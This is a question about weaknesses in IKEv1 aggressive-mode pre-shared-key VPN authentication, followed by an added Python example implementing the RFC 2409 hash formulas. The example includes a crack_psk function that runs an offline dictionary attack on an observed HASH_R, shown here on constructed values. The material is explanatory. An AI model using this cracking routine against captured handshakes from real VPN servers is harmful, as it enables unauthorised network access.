
There are many articles that describe exploitation techniques against a VPN using IPsec with IKE-PSK.

However, I can't understand how the flaws can exist. So I have some questions relating to that:

1) Why, in Aggressive Mode, is the authentication hash transmitted as the response to the initial packet of the VPN client that wants to establish an IPsec tunnel? As a result of this, anyone on the Internet can get an authentication hash from any VPN server exposed on the Internet. A more secure way would be for the client to send the authentication hash first, right?

2) What exactly is that authentication hash? Is it a message hashed with the PSK?

3) When we say that the hash is encrypted in Main Mode, what is the encryption key that is used?

4) Is it possible to simply perform a relay attack (like SMB relay, for example) when a client tries to connect to the VPN server? I don't see any reason why you couldn't do that, as the peer identity is not checked with IKE-PSK. This would be easier than cracking the hash... but no article talks about it.

Thanks for your answers.
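As an added worked example (not part of the original question, and not an answer posted on this page), the following Python implements the pre-shared-key authentication hashes exactly as RFC 2409 section 5.4 defines them (SKEYID = prf(PSK, Ni_b | Nr_b); HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), with prf being HMAC over the negotiated hash) and then shows why a responder's HASH_R that was observed in the clear can be attacked by offline guessing. The assumptions are: SHA-1 as the negotiated hash, and the message field values (cookies, nonces, Diffie-Hellman public values, SA and ID payload bodies) are constructed stand-ins, much shorter than real ones, rather than a capture.

```python
"""IKEv1 aggressive-mode PSK authentication hashes (RFC 2409 s5.4).

Added example; all exchange values below are constructed, not captured.
"""
import hashlib
import hmac
from typing import Dict, Optional, Sequence

PRF = hashlib.sha1  # assumption: the negotiated hash algorithm is SHA-1


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b). prf = HMAC keyed with the PSK."""
    return hmac.new(psk, ni_b + nr_b, PRF).digest()


def hash_i(skeyid: bytes, gxi: bytes, gxr: bytes, cky_i: bytes, cky_r: bytes,
           sai_b: bytes, idii_b: bytes) -> bytes:
    """HASH_I = prf(SKEYID, g^xi | g^xr | CKY-I | CKY-R | SAi_b | IDii_b)."""
    return hmac.new(skeyid, gxi + gxr + cky_i + cky_r + sai_b + idii_b, PRF).digest()


def hash_r(skeyid: bytes, gxr: bytes, gxi: bytes, cky_r: bytes, cky_i: bytes,
           sai_b: bytes, idir_b: bytes) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    return hmac.new(skeyid, gxr + gxi + cky_r + cky_i + sai_b + idir_b, PRF).digest()


# Constructed aggressive-mode exchange. Message 1 (initiator -> responder)
# carries SA, KE (g^xi), Ni and IDii; message 2 (responder -> initiator)
# carries SA, KE (g^xr), Nr, IDir and HASH_R. None of it is encrypted, so a
# passive observer sees every input to HASH_R except the PSK itself.
EXCHANGE: Dict[str, bytes] = {
    "cky_i": bytes.fromhex("0102030405060708"),          # initiator cookie, 8 bytes
    "cky_r": bytes.fromhex("1112131415161718"),          # responder cookie, 8 bytes
    "sai_b": bytes.fromhex("000000010000000100000028"),  # SA payload body (stand-in)
    "gxi": bytes.fromhex("a0" * 16),                     # g^xi stand-in (real: 128+ bytes)
    "gxr": bytes.fromhex("b0" * 16),                     # g^xr stand-in
    "ni_b": bytes.fromhex("c0" * 16),                    # initiator nonce body
    "nr_b": bytes.fromhex("d0" * 16),                    # responder nonce body
    "idii_b": bytes([11, 0, 0, 0]) + b"vpn-group",       # ID_KEY_ID "vpn-group"
    "idir_b": bytes([1, 17, 0x01, 0xf4]) + bytes([192, 0, 2, 1]),  # ID_IPV4_ADDR udp/500
}


def responder_hash_r(psk: bytes, ex: Dict[str, bytes]) -> bytes:
    """What the responder sends in message 2 for a given PSK."""
    skeyid = skeyid_psk(psk, ex["ni_b"], ex["nr_b"])
    return hash_r(skeyid, ex["gxr"], ex["gxi"], ex["cky_r"], ex["cky_i"],
                  ex["sai_b"], ex["idir_b"])


def initiator_hash_i(psk: bytes, ex: Dict[str, bytes]) -> bytes:
    """What the initiator sends in message 3 (its own proof, sent after HASH_R)."""
    skeyid = skeyid_psk(psk, ex["ni_b"], ex["nr_b"])
    return hash_i(skeyid, ex["gxi"], ex["gxr"], ex["cky_i"], ex["cky_r"],
                  ex["sai_b"], ex["idii_b"])


def crack_psk(observed_hash_r: bytes, ex: Dict[str, bytes],
              candidates: Sequence[str]) -> Optional[str]:
    """Offline dictionary attack: recompute HASH_R per candidate PSK and compare.

    Every input other than the PSK was read off the wire, so each guess costs
    two HMACs and needs no further traffic to the VPN server.
    """
    for cand in candidates:
        if hmac.compare_digest(responder_hash_r(cand.encode(), ex), observed_hash_r):
            return cand
    return None


if __name__ == "__main__":
    # The server's reply to our single message 1, computed with its real PSK.
    observed = responder_hash_r(b"Summer2019!", EXCHANGE)
    print("HASH_R seen in message 2:", observed.hex())
    print("recovered PSK:", crack_psk(observed, EXCHANGE, ["password", "vpn", "Summer2019!"]))
```

Note that the RFC formulas bind both Diffie-Hellman public values, both cookies, both nonces and the SA proposal into each hash, and that under the same RFC the key that encrypts Main Mode's identity and hash messages is SKEYID_e, which is derived from SKEYID (so, with PSK authentication, from the PSK and the nonces) together with the shared secret g^xy.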
